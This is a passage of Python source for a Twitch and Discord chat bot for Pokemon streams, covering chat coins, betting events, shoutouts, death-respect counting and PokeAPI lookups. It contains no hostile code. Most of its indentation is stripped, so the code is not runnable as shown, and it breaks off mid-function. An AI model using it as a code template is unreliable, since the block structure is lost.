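        # Helper: look up `key` in the data dict for the currently selected run,
        # creating the run's entry on first access; returns None when unset.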
result = None
if None != self.config['current_run'] and None != self.config['run_data']:
if None == self.config['run_data'].get(self.config['current_run']):
self.config['run_data'][self.config['current_run']] = {}
current_run_data = self.config['run_data'][self.config['current_run']]
if None != current_run_data.get(key):
result = current_run_data[key]
return result
def set_current_run_data(self, key, value):
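        # Helper: store `value` under `key` in the currently selected run's data dict.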
if None != self.config['current_run'] and None != self.config['run_data']:
if None == self.config['run_data'].get(self.config['current_run']):
self.config['run_data'][self.config['current_run']] = {}
self.config['run_data'][self.config['current_run']][key] = value
def is_setrun_command(self, command):
setrun_commands = [
"!howfar",
"!lastrun",
"!nickname",
"!rules",
]
if None != self.config['current_run'] and None != self.config['run_data']:
return command in setrun_commands
else:
return False
def coin_loop(self):
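        # Background thread: poll the Twitch chatters endpoint once a minute and
        # award coins to every listed moderator/viewer (double coins for newer chatters).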
while True:
with self.coin_lock:
try:
url = 'https://tmi.twitch.tv/group/user/' + self.username.lower() + '/chatters'
response = urllib.request.urlopen(url).read().decode('UTF-8')
user_data = json.loads(response)
user_list = []
for u in user_data['chatters']['moderators']:
user_list.append(u)
for u in user_data['chatters']['viewers']:
user_list.append(u)
for u in user_list:
more_coins = 1
if u in self.coin_data['first_coin_times']:
diff = datetime.datetime.now() - datetime.datetime.fromtimestamp(self.coin_data['first_coin_times'][u])
if diff.days <= 7:
more_coins = 2
else:
more_coins = 2
if u in self.coin_data['coins'].keys():
self.coin_data['coins'][u] += more_coins
else:
self.coin_data['coins'][u] = more_coins
timestamp = time.mktime(datetime.datetime.now().timetuple())
self.coin_data['first_coin_times'][u] = timestamp
self.update_coin_data()
except Exception as e:
print("Coin loop exception: " + str(e))
time.sleep(60)
def pcwe_loop(self):
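        # Background thread: watch the whispers drop directory and replay each
        # "user:command" file as if that user had sent the command, then delete the file.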
print("Starting PCWE loop")
path = os.path.join(os.sep, 'home', 'drfujibot', 'drfujibot', 'whispers')
while True:
try:
for fn in os.listdir(path):
fullpath = os.path.join(path, fn)
if os.path.isfile(fullpath):
print("Processing file " + fullpath)
with open(fullpath, 'r') as f:
line = f.readlines()[0]
user = line.split(":")[0]
cmd = line.split(":", 1)[1]
self.processCommand(cmd, self.connection, user)
os.unlink(fullpath)
except Exception as e:
print("Exception: " + str(e))
time.sleep(0.25)
def timed_message_loop(self):
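        # Background thread: emit each configured timed message once its
        # per-message interval (in seconds) has elapsed since the last send.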
message_list = self.config.get('timed_messages')
if None != message_list:
# Message -> last output timestamp
last_output = {}
# Add last output times now so they don't all display on startup
now = datetime.datetime.now()
now_timestamp = time.mktime(now.timetuple())
for m in message_list:
message = list(m.keys())[0]
last_output[message] = now_timestamp
while True:
now = datetime.datetime.now()
now_timestamp = time.mktime(now.timetuple())
for m in message_list:
message = list(m.keys())[0]
interval = list(m.values())[0]
last_timestamp = last_output.get(message)
last_datetime = datetime.datetime.fromtimestamp(last_timestamp)
output_message = False
diff = now - last_datetime
if diff.seconds >= interval:
output_message = True
if True == output_message:
last_output[message] = now_timestamp
self.output_msg(self.connection, message, 'drfujibot')
time.sleep(1)
def do_shoutout_func(self, c, streamer, output_messages, source_user):
output_messages_copy = output_messages[:]
if len(output_messages_copy) == 0:
output_messages_copy.append("Go check out @" + streamer + " at twitch.tv/" + streamer + " They make great content and if you enjoy us, you will enjoy them as well!")
else:
output_copy = []
for m in output_messages_copy:
output_copy.append(m.replace("STREAMER", streamer))
output_messages_copy = output_copy
for m in output_messages_copy:
self.output_msg(c, m, source_user, 0)
def do_shoutout(self, c, streamer, output_messages, delay_seconds, source_user):
t = threading.Timer(delay_seconds, self.do_shoutout_func, [c, streamer, output_messages, source_user])
t.start()
def resolve_bet(self, c, line, source_user):
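        # !resolve <event> <result>: close the event if it is still open, pay out
        # winners (with a first-time winner bonus), and announce the results.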
if self.foundCoinFile:
if len(line.split(" ")) >= 3:
event_name = line.split(" ")[1].rstrip("\n").rstrip("\r").lower()
result = line.split(" ")[2].rstrip("\n").rstrip("\r").lower()
if None != self.bet_config['events'].get(event_name):
if result in self.bet_config['events'][event_name]['outcomes'].keys():
payout = self.open_event_rewards[event_name]
# If it wasn't closed before resolve, close it now
if event_name in self.open_events.keys():
self.closed_events[event_name] = self.open_events[event_name]
del self.open_events[event_name]
del self.open_event_rewards[event_name]
self.config['open_events'] = self.open_events
self.config['open_event_rewards'] = self.open_event_rewards
self.config['closed_events'] = self.closed_events
self.update_config()
if event_name in self.closed_events.keys():
winners = []
all_users = []
pot = 0
log_msg = str(self.closed_events[event_name])
logname = self.username + ".log"
with open(logname, "a") as f:
f.write(log_msg + "\n")
f.flush()
# closed_events -> event_name: {user -> wager, user -> wager, ...}
for k in self.closed_events[event_name].keys():
pot += self.closed_events[event_name][k][1]
bet = self.closed_events[event_name][k][0]
event_mappings = self.bet_config['events'].get(event_name)
result_mappings = None
if None != event_mappings:
result_mappings = event_mappings['mappings'].get(result)
if bet == result or ( None != result_mappings and bet in result_mappings ):
winners.append(k)
all_users.append(k)
if len(winners) > 0:
if self.bet_config['events'].get(event_name):
output = "'" + event_name + "' event winners get a payout! "
else:
output = "Unfortunately, there were no winners for the '" + event_name + "' event"
first_time_winners = []
if len(winners) == 0:
payout = 0
bet_info = self.bet_config['events'].get(event_name)
with self.coin_lock:
for w in winners:
if bet_info:
output += w + '(' + str(int(payout)) + ') '
self.coin_data['coins'][w] += payout
if None == self.config['winners'].get(w):
self.coin_data['coins'][w] += 1000
first_time_winners.append(w)
self.config['winners'][w] = 1
self.update_coin_data()
self.output_msg(c, output, source_user)
if len(first_time_winners) > 0:
self.update_config()
output = "First-time bet winners awarded a 1000 coin bonus: "
output += ", ".join(first_time_winners)
self.output_msg(c, output, source_user)
del self.closed_events[event_name]
self.config['closed_events'] = self.closed_events
if None != self.config['current_run'] and None != self.config['run_data']:
if None != self.config['run_data'].get(self.config['current_run']):
self.config['run_data'][self.config['current_run']]['closed_events'] = {}
self.update_config()
else:
self.output_msg(c, "Could not find active event '" + event_name + "'", source_user)
else:
self.output_msg(c, "Not a valid outcome: '" + result + "'", source_user)
else:
self.output_msg(c, "Could not find active event '" + event_name + "'", source_user)
else:
self.output_msg(c, "Format: !resolve <event_name> <result>", source_user)
else:
self.output_msg(c, "Betting has not been configured", source_user)
def new_bet(self, c, line, source_user):
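        # !event <name> <reward>: open a new betting event, provided no other
        # event is currently open and this name has no unresolved closed event.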
if self.foundCoinFile:
if len(line.split(" ")) == 3:
event_name = line.split(" ")[1].rstrip("\n").rstrip("\r").lower()
event_reward = 0
try:
event_reward = int(line.split(" ")[2].rstrip("\n").rstrip("\r").lower())
except:
self.output_msg(c, "Invalid reward", source_user)
if event_reward > 0:
if len(self.open_events.keys()) == 0:
if event_name not in self.closed_events.keys():
self.open_events[event_name] = {}
self.open_event_rewards[event_name] = event_reward
output = "Betting has opened! Use '!bet <guess>' to play!"
self.output_msg(c, output, source_user)
self.config['open_events'] = self.open_events
self.config['open_event_rewards'] = self.open_event_rewards
self.update_config()
else:
self.output_msg(c, "Existing event '" + event_name + "' must be resolved", source_user)
else:
self.output_msg(c, "There is an open event already in progress: " + list(self.open_events.keys())[0], source_user)
else:
self.output_msg(c, "Format: !event <name> <reward>", source_user)
else:
self.output_msg(c, "Betting has not been configured", source_user)
def get_game(self, username=None):
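        # Return the game set for this channel, or the per-user game from the
        # whisper config when in whisper/Discord mode (defaults to alpha-sapphire).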
if self.game and self.whisperMode == False:
return self.game
else:
config = None
game = None
if self.bot_type and self.bot_type == 'discord':
configname = 'whisper_discord.json'
else:
configname = 'whisper.json'
with open(configname, 'r') as config_file:
config = json.load(config_file)
if config:
if self.bot_type and self.bot_type == 'discord':
user = username
else:
user = username.lower()
game = config['games'].get(user)
if None == game:
game = "alpha-sapphire"
return game
def get_game_group(self, user):
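        # Map the user's current game to its PokeAPI version-group name,
        # e.g. 'fire-red' -> 'firered-leafgreen'.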
group = ''
game = self.get_game(user).lower()
if 'red' == game or 'blue' == game:
group = 'red-blue'
elif 'yellow' == game:
group = 'yellow'
elif 'gold' == game or 'silver' == game:
group = 'gold-silver'
elif 'crystal' == game:
group = 'crystal'
elif 'ruby' == game or 'sapphire' == game:
group = 'ruby-sapphire'
elif 'emerald' == game:
group = 'emerald'
elif 'leaf-green' == game or 'fire-red' == game:
group = 'firered-leafgreen'
elif 'diamond' == game or 'pearl' == game:
group = 'diamond-pearl'
elif 'platinum' == game:
group = 'platinum'
elif 'heart-gold' == game or 'soul-silver' == game:
group = 'heartgold-soulsilver'
elif 'black' == game or 'white' == game:
group = 'black-white'
elif 'black-2' == game or 'white-2' == game:
group = 'black-2-white-2'
elif 'x' == game or 'y' == game:
group = 'x-y'
elif 'omega-ruby' == game or 'alpha-sapphire' == game:
group = 'omega-ruby-alpha-sapphire'
elif 'sun' == game or 'moon' == game:
group = 'sun-moon'
return group
def output_msg(self, c, output, user, sleeptime=2):
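        # Send `output` to chat (or as a whisper), splitting it into numbered
        # chunks that fit Twitch's message limit, logging each chunk, and
        # sleeping `sleeptime` seconds between sends.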
chunk_size = 256 - 8
if self.whisperMode:
chunk_size = 256 - 8 - 5 - len(user)
chunks = [ output[i:i+chunk_size] for i in range(0, len(output), chunk_size) ]
j = 1
for ch in chunks:
if len(chunks) > 1:
ch = "(" + str(j) + "/" + str(len(chunks)) + ") " + ch
if self.whisperMode:
c.privmsg("#" + user, "/w " + user + " " + ch)
else:
c.privmsg(self.channel, ch)
print(ch)
if True == self.whisperMode:
logname = 'whisper.log'
else:
logname = self.username + ".log"
with open(logname, "a") as f:
f.write(ch + "\n")
f.flush()
j += 1
time.sleep(sleeptime)
def is_valid_command(self, cmd):
cmd = cmd.lower()
cmds = [
"!commands",
"!help",
"!drfujihelp",
"!uptime",
"!bee",
"!sprite",
"!shaq",
"!fixit",
"!lowkick",
"!grassknot",
"!raid",
"!song",
"!honestly",
"!gender",
"!pokemon",
"!offen",
"!defen",
"!abilities",
"!move",
"!ability",
"!nature",
"!item",
"!learnset",
"!tmset",
"!does",
"!weak",
"!resist",
"!type",
"!setgame",
"!evolve",
"!char",
"!ev",
"!faster",
"!exp",
"!remind",
"!whisper",
"!deaths",
"!setdeaths",
"!rip",
"!ez",
"!fallen",
"!adduser",
"!removeuser",
"!addshoutout",
"!removeshoutout",
"!whatis",
"!anagram",
"!event",
"!close",
"!cancel",
"!resolve",
"!bet",
"!daily",
"!balance",
"!leaderboard",
"!coins",
"!credit",
"!riprun",
"!addcom",
"!editcom",
"!delcom",
"!so ",
"!shoutout",
"!notify",
"!quote",
"!addquote",
"!delquote",
"!elo",
"!smogon",
"!chatbattle",
"!forfeit",
"!heavyslam",
"!heatcrash",
"!setrun",
"!combo",
"!attempt",
"!swearjar",
"!define",
]
for c in cmds:
if cmd.startswith(c):
return True
return False
def is_extra_command(self, cmd):
if True == self.config['extra_commands_on']:
for c in self.config['extra_commands'].keys():
if cmd.lower().startswith(c):
return True
run_cmd = self.get_current_run_data(cmd)
if None != run_cmd:
return True
return False
def is_moderator_command(self, cmd):
cmds = [
"!rip",
"!ez",
"!event",
"!close",
"!cancel",
"!resolve",
"!riprun",
"!setrun",
"!addshoutout",
"!removeshoutout",
"!adduser",
"!removeuser",
"!addcom",
"!editcom",
"!delcom",
"!setdeaths",
"!remind",
"!addquote",
"!delquote",
"!swearjar",
"!define",
"!credit",
"!so",
"!shoutout",
]
for c in cmds:
if cmd.startswith(c):
return True
return False
def log_cmd(self, cmd, sourcenick):
if self.is_valid_command(cmd):
if True == self.whisperMode:
if self.bot_type and self.bot_type == "discord":
logname = 'whisper_discord.log'
else:
logname = 'whisper.log'
else:
logname = self.username + ".log"
with open(logname, "a") as f:
f.write(sourcenick + " - " + cmd + "\n")
f.flush()
def on_nicknameinuse(self, c, e):
c.nick(c.get_nickname() + "_")
def on_welcome(self, c, e):
g_c = c
if True == self.whisperMode:
c.cap('REQ', ':twitch.tv/commands')
print("Ready for whisper mode")
else:
c.join(self.channel)
print("Joined chat for %s" % (self.channel))
c.cap('REQ', ":twitch.tv/tags")
def on_privmsg(self, c, e):
pass
def on_whisper(self, c, e):
line = e.arguments[0]
self.log_cmd(line, e.source.nick)
self.processCommand(line, c, e.source.nick)
if e.source.nick.lower() not in self.previous_users:
self.output_msg(c, "I see this may be your first time using DrFujiBot! Feel free to check out the documentation: http://goo.gl/JGG3LT", e.source.nick)
self.previous_users[e.source.nick.lower()] = 1
with open('whisper_users.json', 'w') as config_file:
config_file.write(json.dumps(self.previous_users))
def on_discord_msg(self, line, source_user, source_id):
if source_user in self.permitted_users or self.permissions is False or is_global_command(line):
self.log_cmd(line, source_user)
c = None
self.processCommand(line, c, source_user, source_id)
def handle_raid_or_meme(self, c, line):
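        # Track repeated chat lines: count combo chains (PokemonChallenges only)
        # and detect chat-wide memes/raids from the recent-lines buffer.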
if self.meme_mode:
if "pokemonchallenges" == self.username.lower():
if self.last_line == line and line != "F" and line != "f":
self.same_counter += 1
else:
if self.same_counter >= 5 and self.last_line != "F" and self.last_line != "f":
self.output_msg(c, str(self.same_counter) + "x combo ( " + self.last_line + " )", "drfujibot")
if self.same_counter > self.config['highest_combo'][0]:
pair = []
pair.append(self.same_counter)
pair.append(self.last_line)
self.config['highest_combo'] = pair
self.update_config()
self.same_counter = 1
self.last_line = line
line_dict = {}
for e in self.last_lines:
if e[1].lower() != 'drfujibot':
if line_dict.get(e[1]):
line_dict[e[1]] += 1
else:
line_dict[e[1]] = 1
check_unique_users = False
meme = ''
for k in line_dict.keys():
if line_dict[k] > 5:
check_unique_users = True
meme = k
break
user_list = []
if check_unique_users:
                for u in self.last_lines:
                    # last_lines holds (nick, line) tuples; count unique nicks only
                    user_list.append(u[0])
user_list = list(set(user_list))
# if more than 3 unique users are spamming the same thing, participate in the raid/meme!
if len(user_list) >= 3:
if "f" != meme and "F" != meme and "pokemoF" != meme and "EZ" != meme:
#self.output_msg(c, meme, "drfujibot")
pass
def handle_cheer(self, source_user, num_bits):
print("Handling cheer for " + str(num_bits) + " bits from " + source_user)
def handle_auto_shoutout(self, c, user):
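        # Automatically shout out configured streamers at most once per day each,
        # a few seconds after they chat.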
auto_shoutout_list = self.config.get('auto_shoutout')
if None != auto_shoutout_list and user in auto_shoutout_list:
now = datetime.datetime.now()
if self.config['last_auto_shoutout'].get(user):
last = datetime.datetime.fromtimestamp(self.config['last_auto_shoutout'][user])
else:
last = now - datetime.timedelta(hours=25)
diff = now - last
if diff.days >= 1:
self.do_shoutout(c, user, self.config['shoutout_messages'], random.randint(5, 10), "drfujibot")
timestamp = time.mktime(now.timetuple())
self.config['last_auto_shoutout'][user] = timestamp
self.update_config()
def on_pubmsg(self, c, e):
line = e.arguments[0]
if "TwitchPlaysShowdown" in self.username and \
( "DrFujiBot won the battle" in line or \
"DrFujiBot lost the battle" in line ) and \
"drfujibot" in e.source.nick:
print('match')
self.output_msg(c, "!chatbattle", e.source.nick)
return
self.handle_respects(c, line, e.source.nick, discord=False)
if len(self.last_lines) > 5:
self.last_lines = self.last_lines[1:]
self.last_lines.append((e.source.nick, line))
self.handle_raid_or_meme(c, line)
#self.handle_auto_shoutout(c, e.source.nick)
is_mod = False
is_sub = False
for tag in e.tags:
if tag['key'] == 'bits':
self.handle_cheer(e.source.nick, int(tag['value']))
break
elif tag['key'] == 'badges':
if tag['value']:
badges = tag['value'].split(',')
for b in badges:
if b.split('/')[0] == 'moderator' or b.split('/')[0] == 'broadcaster':
is_mod = True
elif b.split('/')[0] == 'subscriber':
is_sub = True
if self.is_valid_command(line) or self.is_extra_command(line):
if self.is_moderator_command(line):
if e.source.nick.lower() in self.moderators or \
'drfujibot' == e.source.nick.lower() or \
is_mod:
self.log_cmd(line, e.source.nick)
self.processCommand(line, c, e.source.nick)
else:
if e.source.nick.lower() in self.permitted_users or \
(is_sub and self.username.lower() == "pokemonchallenges") or \
self.permissions is False or \
is_global_command(line) or \
self.is_extra_command(line):
self.log_cmd(line, e.source.nick)
self.processCommand(line, c, e.source.nick)
else:
if not ( line.startswith("!commands") or line.startswith("!so ") or line.startswith("!shoutout ") or line.startswith("!help") ):
if self.username.lower() == "pokemonchallenges":
self.output_msg(c, "Sorry, that command is only for mods or subs, but you can whisper me!", e.source.nick)
else:
self.output_msg(c, "Sorry, that command is only for mods, but you can whisper me!", e.source.nick)
def handle_respects(self, c, line, source_user, discord):
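        # Count unique 'F' messages for 20 seconds after each recorded death (and
        # 'EZ' messages while an EZ count is active), then announce the totals.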
if self.ez:
now = time.time()
if now - self.ez_start >= 20:
num_respects = self.ez_count
self.output_msg(c, str(num_respects) + " EZ 's for PC", source_user)
self.ez = False
else:
if line.startswith("EZ ") or line == "EZ":
self.ez_count += 1
if len(self.current_deaths.keys()) > 0:
now = time.time()
names_to_delete = []
# One F counts for all respects in progress
for name in self.current_deaths.keys():
if now - self.current_deaths[name] >= 20:
num_respects = len(self.deaths_dict[name])
self.fallen[name] = num_respects
self.fallen_timestamps[name] = now
self.output_msg(c, str(num_respects) + " respects for " + name, source_user)
self.config['fallen'] = self.fallen
self.config['fallen_timestamps'] = self.fallen_timestamps
self.update_config()
names_to_delete.append(name)
else:
if line.upper() == "F" or line == "pokemoF":
if source_user not in self.deaths_dict[name]:
self.deaths_dict[name].append(source_user)
for n in names_to_delete:
del self.current_deaths[n]
def update_config(self):
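        # Persist the in-memory config to the per-channel JSON file
        # (Discord bots use a separate '<username>_discord.json' file).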
configname = ""
if self.bot_type and self.bot_type == 'discord':
configname = self.username + '_discord.json'
else:
configname = self.username + '.json'
with open(configname, 'w') as config_file:
config_file.write(json.dumps(self.config))
def update_pcce(self):
with open('PCCE.json', 'w') as config_file:
config_file.write(json.dumps(self.pcce))
def update_coin_data(self):
with open(self.username + '_coins.json', 'w') as config_file:
config_file.write(json.dumps(self.coin_data))
if "pokemonchallenges" == self.username.lower() or "pokemonrealtime" == self.username.lower():
self.pcce['coins'] = self.coin_data['coins']
self.update_pcce()
def processCommand(self, line, c, source_user, source_id=None, prefix=None):
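        # Command dispatcher: lower-case the command word, enforce the command
        # whitelist if one is configured, then route to the matching handler below.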
if " " in line:
line_start = ""
for char in line:
if " " != char:
line_start += char.lower()
else:
break
line = line_start + " " + line.split(" ", 1)[1]
else:
line = line.lower()
print(line)
if len(self.config['command_whitelist']) > 0:
command = line
if ' ' in command:
command = command.split(' ')[0]
if command not in self.config['command_whitelist']:
return
if line.startswith("!permissions") and len(line) >= len("!permissions ") + 2:
#toggle = line.split(" ")[1].rstrip("\n").rstrip("\r")
#if "on" in toggle:
# self.permissions = True
# self.output_msg(c, "Only permitted users can talk to me!", source_user)
#elif "off" in toggle:
# self.permissions = False
# self.output_msg(c, "Everyone can talk to me!", source_user)
pass
elif line.startswith("!commands") or line.startswith("!help") or line.startswith("!drfujihelp"):
should_output = False
if line.startswith("!commands"):
if True == self.config['extra_commands_on']:
should_output = True
else:
should_output = True
if should_output:
output = "See the documentation for commands and help: http://goo.gl/JGG3LT"
self.output_msg(c, output, source_user)
elif line.startswith("!sprite "):
if len(line.split(" ")) >= 2:
pokemon = line.split(" ")[1].rstrip("\n").rstrip("\r")
self.output_msg(c, pokemon.capitalize() + " sprite: http://everoddish.com/RedbYNv.png", source_user)
else:
self.output_msg(c, "Format: !sprite <pokemon>", source_user)
elif line == "!bee":
out = ""
while len(out) < 12:
out += self.bee[ self.bee_index ]
self.bee_index += 1
if len(out) <= 11:
out += " "
while len(out) > 12:
out = " ".join(out.split(" ")[:-1])
self.bee_index -= 1
self.output_msg(c, out, source_user)
self.config['bee_index'] = self.bee_index
self.update_config()
elif line == "!shaq":
out = ""
while len(out) < 12:
out += self.shaq[ self.shaq_index ]
self.shaq_index += 1
if self.shaq_index >= len(self.shaq):
self.shaq_index = 0
if len(out) <= 11:
out += " "
while len(out) > 12:
out = " ".join(out.split(" ")[:-1])
self.shaq_index -= 1
if self.shaq_index <= 0:
self.shaq_index = len(self.shaq) - 1
self.output_msg(c, out, source_user)
self.config['shaq_index'] = self.shaq_index
self.update_config()
elif line.startswith("!honestly"):
if self.username.lower() == "pokemonchallenges":
if len(line.split(" ")) >= 3:
victim = line.split(" ")[1].rstrip("\n").rstrip("\r")
killer = line.split(" ")[2].rstrip("\n").rstrip("\r")
else:
victim = "Medicham"
killer = "Tangrowth"
output = "Honestly PC fuck you. That "
output += victim
output += " was the only mon I was ever attached to in this run and it did so much in the E4 and then you go and act all confident with it and keep it in on a "
output += killer
self.output_msg(c, output, source_user)
elif line.startswith("!whisper"):
output = "Only the following users have DrFujiBot permission: "
output += ", ".join(self.permitted_users)
output += " - If you want to use DrFujiBot yourself, send it a whisper!"
self.output_msg(c, output, source_user)
elif line.startswith("!pokemon"):
if len(line.split(" ")) >= 2:
name = line.split(" ")[1].rstrip("\n").rstrip("\r").lower()
name = fix_pokemon_name(name)
try:
p = drfujibot_pykemon.api.get(pokemon=name,url=self.config['pokeapi_url'])
type1 = p.types[0].capitalize()
type2 = None
if len(p.types) > 1:
type2 = p.types[1].capitalize()
output = name.capitalize() + ": [" + type1
if type2:
output += ", " + type2 + "] "
else:
output += "] "
output += "HP(" + str(p.hp) + ") "
output += "Attack(" + str(p.attack) + ") "
output += "Defense(" + str(p.defense) + ") "
output += "Sp. Atk(" + str(p.sp_atk) + ") "
output += "Sp. Def(" + str(p.sp_def) + ") "
output += "Speed(" + str(p.speed) + ") "
output += "Abilities: "
for a in p.abilities:
output += a.replace('-', ' ').title()
output += ", "
current_gen = genNameToNum(self.get_game_group(source_user))
if len(p.hidden_ability) == 1 and current_gen >= 5:
output += p.hidden_ability[0].replace('-', ' ').title()
output += ' (HA)'
else:
output = output.rsplit(", ", 1 )[0]
self.output_msg(c, output, source_user)
except drfujibot_pykemon.exceptions.ResourceNotFoundError:
#output = "Pokemon '" + name + "' not found."
#suggestions = self.pokemon_corrector.suggest(name.capitalize(), limit=3)
#if len(suggestions) > 0:
# output += " Did you mean: "
# output += ", ".join(suggestions)
#self.output_msg(c, output, source_user)
suggestions = self.pokemon_corrector.suggest(name.capitalize(), limit=3)
if len(suggestions) > 0:
self.processCommand("!pokemon " + suggestions[0], c, source_user)
else:
self.output_msg(c, "Pokemon '" + name + "' not found", source_user)
except:
print("Unexpected error: " + str(sys.exc_info()[0]))
elif line.startswith("!offen"):
name = line.split(" ")[1].rstrip("\n").rstrip("\r").lower()
name = fix_pokemon_name(name)
try:
p = drfujibot_pykemon.api.get(pokemon=name,url=self.config['pokeapi_url'])
output = name.capitalize() + ": "
output += "Attack(" + str(p.attack) + ") "
output += "Sp. Atk(" + str(p.sp_atk) + ") "
output += "Speed(" + str(p.speed) + ") "
self.output_msg(c, output, source_user)
except drfujibot_pykemon.exceptions.ResourceNotFoundError:
#output = "Pokemon '" + name + "' not found."
#suggestions = self.pokemon_corrector.suggest(name.capitalize(), limit=3)
#if len(suggestions) > 0:
# output += " Did you mean: "
# output += ", ".join(suggestions)
#self.output_msg(c, output, source_user)
suggestions = self.pokemon_corrector.suggest(name.capitalize(), limit=3)
if len(suggestions) > 0:
self.processCommand("!offen " + suggestions[0], c, source_user)
else:
self.output_msg(c, "Pokemon '" + name + "' not found", source_user)
except:
print("Unexpected error: " + str(sys.exc_info()[0]))
elif line.startswith("!defen"):
name = line.split(" ")[1].rstrip("\n").rstrip("\r").lower()
name = fix_pokemon_name(name)
try:
p = drfujibot_pykemon.api.get(pokemon=name,url=self.config['pokeapi_url'])
output = name.capitalize() + ": "
output += "HP(" + str(p.hp) + ") "
output += "Defense(" + str(p.defense) + ") "
output += "Sp. Def(" + str(p.sp_def) + ") "
self.output_msg(c, output, source_user)
except drfujibot_pykemon.exceptions.ResourceNotFoundError:
#output = "Pokemon '" + name + "' not found."
#suggestions = self.pokemon_corrector.suggest(name.capitalize(), limit=3)
#if len(suggestions) > 0:
# output += " Did you mean: "
# output += ", ".join(suggestions)
#self.output_msg(c, output, source_user)
suggestions = self.pokemon_corrector.suggest(name.capitalize(), limit=3)
if len(suggestions) > 0:
self.processCommand("!defen " + suggestions[0], c, source_user)
else:
self.output_msg(c, "Pokemon '" + name + "' not found", source_user)
except:
print("Unexpected error: " + str(sys.exc_info()[0]))
elif line.startswith("!abilities"):
name = line.split(" ")[1].rstrip("\n").rstrip("\r").lower()
name = fix_pokemon_name(name)
try:
p = drfujibot_pykemon.api.get(pokemon=name,url=self.config['pokeapi_url'])
output = name.capitalize() + ": "
for a in p.abilities:
output += a.replace('-', ' ').title()
output += ", "
current_gen = genNameToNum(self.get_game_group(source_user))
if len(p.hidden_ability) == 1 and current_gen >= 5:
output += p.hidden_ability[0].replace('-', ' ').title()
output += ' (HA)'
else:
output = output.rsplit(", ", 1 )[0]
self.output_msg(c, output, source_user)
except drfujibot_pykemon.exceptions.ResourceNotFoundError:
#output = "Pokemon '" + name + "' not found."
#suggestions = self.pokemon_corrector.suggest(name.capitalize(), limit=3)
#if len(suggestions) > 0:
# output += " Did you mean: "
# output += ", ".join(suggestions)
#self.output_msg(c, output, source_user)
suggestions = self.pokemon_corrector.suggest(name.capitalize(), limit=3)
if len(suggestions) > 0:
self.processCommand("!abilities " + suggestions[0], c, source_user)
else:
self.output_msg(c, "Pokemon '" + name + "' not found", source_user)
except:
print("Unexpected error: " + str(sys.exc_info()[0]))
elif line.startswith("!move"):
name = line.split(" ", 1)[1].rstrip("\n").rstrip("\r").lower()
try:
name = name.replace(" ", "-")
name = name.replace(",", "-")
name = fix_z_move(name)
m = drfujibot_pykemon.api.get(move=name,url=self.config['pokeapi_url'])
# Go through all the past values, and apply any ones that are relevant.
for pv in m.past_values:
if genNameToNum(self.get_game_group(source_user)) <= genNameToNum(pv.get('version_group').get('name')):
                        # Apply every relevant past value, not just the first one found
                        if pv.get('pp'):
                            m.pp = pv.get('pp')
                        if pv.get('power'):
                            m.power = pv.get('power')
                        if pv.get('accuracy'):
                            m.accuracy = pv.get('accuracy')
                        if pv.get('type'):
                            m.type = pv.get('type')
                        if pv.get('effect_chance'):
                            m.ailment_chance = pv.get('effect_chance')
if prefix:
output = prefix
else:
output = ""
output += name.replace("-", " ").title() + ": [" + m.type.capitalize() + "] "
output += "BasePower(" + str(m.power) + ") Class(" + m.damage_class.capitalize() + ") "
output += "Accuracy(" + str(m.accuracy) + ") PP(" + str(m.pp) + ") "
if m.flinch_chance > 0:
output += "Flinch(" + str(m.flinch_chance) + "%) "
if len(m.ailment) > 0 and m.ailment_chance > 0:
output += m.ailment.capitalize() + "(" + str(m.ailment_chance) + "%) "
if m.crit_rate == 1:
output += "Crit(+) "
if m.priority == 1:
output += "Priority(+) "
for s in m.stat_changes:
stat = s[0].capitalize()
stat = stat.replace("Special-attack", "SpAtk")
stat = stat.replace("Special-defense", "SpDef")
output += "Stat(" + stat + " "
if s[1] < 0:
output += str(s[1])
else:
output += "+" + str(s[1])
if m.stat_chance > 0:
output += " " + str(m.stat_chance) + "%"
output += ") "
m.description = m.description.replace("$effect_chance", str(m.stat_chance))
output += m.description
self.output_msg(c, output, source_user)
except drfujibot_pykemon.exceptions.ResourceNotFoundError:
#output = "Move '" + name + "' not found."
#suggestions = self.move_corrector.suggest(name.replace('-', ' ').title(), limit=3)
#if len(suggestions) > 0:
# output += " Did you mean: "
# output += ", ".join(suggestions)
#self.output_msg(c, output, source_user)
suggestions = self.move_corrector.suggest(name.replace('-', ' ').title(), limit=1)
if len(suggestions) > 0:
self.processCommand("!move " + suggestions[0], c, source_user)
else:
self.output_msg(c, "Move '" + name + "' not found", source_user)
except:
print("Unexpected error: " + str(sys.exc_info()[0]))
elif line.startswith("!nature"):
name = line.split(" ")[1].rstrip("\n").rstrip("\r").lower()
try:
m = drfujibot_pykemon.api.get(nature=name)
output = name.capitalize() + ": "
m.inc_stat = m.inc_stat.capitalize()
m.dec_stat = m.dec_stat.capitalize()
if "None" in m.inc_stat:
output += "Neutral"
else:
m.inc_stat = m.inc_stat.replace("Special-attack", "SpAtk")
m.inc_stat = m.inc_stat.replace("Special-defense", "SpDef")
output += "+" + m.inc_stat + " "
m.dec_stat = m.dec_stat.replace("Special-attack", "SpAtk")
m.dec_stat = m.dec_stat.replace("Special-defense", "SpDef")
output += "-" + m.dec_stat + " "
self.output_msg(c, output, source_user)
except drfujibot_pykemon.exceptions.ResourceNotFoundError:
self.output_msg(c, "Nature '" + name + "' not found.", source_user)
except:
print("Unexpected error: " + str(sys.exc_info()[0]))
elif line.startswith("!ability"):
name = line.split(" ", 1)[1].rstrip("\n").rstrip("\r").lower()
try:
name = name.replace(" ", "-")
a = drfujibot_pykemon.api.get(ability=name,url=self.config['pokeapi_url'])
current_gen = genNameToNum(self.get_game_group(source_user))
if current_gen >= a.gen_num:
if prefix:
output = prefix
else:
output = ""
output += name.replace('-', ' ').title() + ": "
output += a.effect
else:
output = "Ability '" + name.title() + "' is not present in Gen " + str(current_gen)
self.output_msg(c, output, source_user)
except drfujibot_pykemon.exceptions.ResourceNotFoundError:
self.output_msg(c, "Ability '" + name + "' not found.", source_user)
except Exception as e:
print("Unexpected error: " + str(e))
# !does <pokemon> learn <move>
elif line.startswith("!does"):
regex = re.compile("!does (.*) learn (.*)")
result = regex.match(line)
poke = None
move = None
if result:
poke = result.group(1).lower()
poke = fix_pokemon_name(poke)
move = result.group(2).lower()
move = move.replace(" ", "-")
else:
self.output_msg(c, "Invalid format. Usage: !does <pokemon> learn <move>", source_user)
if poke and move:
p = None
try:
p = drfujibot_pykemon.api.get(pokemon=poke,url=self.config['pokeapi_url'])
try:
# Just for move name validation:
m = drfujibot_pykemon.api.get(move=move,url=self.config['pokeapi_url'])
info_list = [move_info for move_info in p.moves if move in move_info.get('move').get('name')]
info_list_by_gen = []
for i in info_list:
for version in i.get('version_group_details'):
gen_name = version.get('version_group').get('name')
